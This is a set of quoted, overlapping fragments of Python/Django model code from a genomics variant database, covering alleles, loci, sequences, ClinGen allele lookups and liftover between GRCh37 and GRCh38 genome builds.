"variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a",
"qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self):",
"on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build)",
"AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return",
"format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else:",
"other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names =",
"other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)",
"str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return",
"Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only",
"django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38",
"\"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q",
"alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name,",
"return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not",
"the same allele (due to our normalization not being the same as ClinGen",
"== ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class",
"alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt =",
"is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\"",
"genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id",
"first Alleles must have already been created - allele_source used to retrieve them",
"special or reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property",
"= self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38,",
"genome_build: GenomeBuild): \"\"\" This is called at the end of a liftover pipeline",
"\"\"\" Variant alt sequence is standard [GATCN] (ie not special or reference) \"\"\"",
"return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\"",
"!= self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self):",
"False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING)",
"other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for",
"is to md5sum seq and make the constraint on that. Another possible solution",
"if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version",
"other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save()",
"Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import",
"FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error =",
"return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self):",
"scaffolds) - in those cases # we'll have the same variant linked through",
"Variants So don't want them on the Variant object - instead do 1-to-1",
"same allele (due to our normalization not being the same as ClinGen or",
"annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query",
"def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self,",
"class Locus(models.Model): \"\"\" 1 per line in a VCF file (multiple Variants with",
"self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source =",
"variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None",
"from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver",
"va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy",
"= format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant,",
"return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self)",
"It's a bug to have the same 3 variant/build/allele so we can add",
"canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first():",
"va = vas.first() if va: return va.variant raise ValueError(f'Could not find any variants",
"def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not",
"on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\"",
"snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build",
"try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors",
"return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length !=",
"__str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover",
"= models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We",
"settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles",
"(API call) If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple()",
"format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\"",
"alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant",
"return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\"",
"get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def",
"self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all():",
"-> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist:",
"of Variants So don't want them on the Variant object - instead do",
"\"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\"",
"return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele:",
"qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not",
"class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant can",
"Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,",
"that requires installing the btree_gist extension (requires postgres Admin rights). Django 3 has",
"v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if",
"Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via",
"return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection =",
"then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we",
"build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\"",
"Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) ->",
"loci in the build being used by ClinGen) - but it's not likely.",
"django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils",
"Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).",
"can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq,",
"if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if",
"= [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count =",
"a VCF where ID is set to Allele.pk and then creating VariantAllele entries",
"possible solution is to use Gist indexes but that requires installing the btree_gist",
"the row) There is only 1 Variant for a given locus/alt per database",
"self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True",
"bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special or reference)",
"file (multiple Variants with different alt alleles point to the same locus) There",
"= genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first():",
"'Variant': vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if",
"def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool:",
"if the other build shares existing contig genome_build_contigs = set(c.pk for c in",
"can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have been possible",
"import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models",
"variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple()",
"full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref,",
"to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return",
"if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele =",
"collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline",
"if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele,",
"!= self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"alt or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq ==",
"the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool =",
"@staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict",
"models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq)",
"exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs",
"format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types",
"It's possible for multiple variants from the same genome build to resolve to",
"variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except",
"regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except",
"**dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build",
"best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self,",
"There is only 1 Variant for a given locus/alt per database (handled via",
"If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from",
"seq is unique (so Locus/Variant can have unique constraints) Postgres by default uses",
"@lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name,",
"If False does not check for missing representations \"\"\" if liftover_complete: v37 =",
"{self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class",
"= \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status =",
"- deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self)",
"have the same 3 variant/build/allele so we can add that unique_together constraint We",
"null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message = models.TextField()",
"a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig,",
"None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: #",
"build {genome_build}') if not va: va = vas.first() if va: return va.variant raise",
"get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status !=",
"\"\"\" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position",
"super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if",
"and self.allele.clingen_allele is None: if self.error: # Retry if server was down return",
"c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool =",
"'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can be slow",
"it's not likely. It's a bug to have the same 3 variant/build/allele so",
"va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find",
"\" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE)",
"abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\"",
"large TextFields give error of: \"index row requires x bytes, maximum size is",
"\".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\"",
"def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy",
"from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from",
"Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref,",
"pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, {",
"@lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None",
"return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If",
"import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from",
"other build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for",
"FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first():",
"def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele",
"from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation",
"snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus",
"> self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def",
"multiple variants from the same genome build to resolve to the same allele",
"Variant object - instead do 1-to-1 \"\"\" # Some builds share contigs (eg",
"variants for same change point to same allele This is generally done via",
"def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return",
"!= Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant",
"do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT and",
"models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same",
"return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must",
"on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome",
"loci in a genome build being represented by 1 loci in the build",
"\"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True)",
"This is generally done via ClinGen Allele Registry, but sometimes that can fail.",
"to use Gist indexes but that requires installing the btree_gist extension (requires postgres",
"re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf",
"regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4",
"= self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass",
"= Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}'",
"(cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\"",
"= None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError:",
"if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple",
"- but it's not likely. It's a bug to have the same 3",
"not va: va = vas.first() if va: return va.variant raise ValueError(f'Could not find",
"[\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']:",
"with different alt alleles point to the same locus) There is only 1",
"@property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:",
"self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return",
"if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def",
"return va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self,",
"f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) ->",
"self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs",
"both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele:",
"V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) ->",
"VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod",
"reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va:",
"name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def",
"8191\" The easiest solution is to md5sum seq and make the constraint on",
"Contigs must match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs",
"your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple",
"usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\"",
"other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have",
"liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of a liftover",
"check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()",
"from django.conf import settings from django.contrib.auth.models import User from django.db import models, IntegrityError",
"allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to",
"solution is to use Gist indexes but that requires installing the btree_gist extension",
"qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\"",
"return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel):",
"'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def",
"models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on",
"import User from django.db import models, IntegrityError from django.db.models import Value as V,",
"other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)",
"output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if",
"return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model):",
"get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return",
"Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired",
"already been created - allele_source used to retrieve them The VCF (in genome_build",
"django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from",
"alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt",
"per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return",
"3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq",
"str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has",
"flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try:",
"import models, IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion",
"bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def",
"import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import",
"pipeline involves reading through a VCF where ID is set to Allele.pk and",
"> max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def",
"flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import",
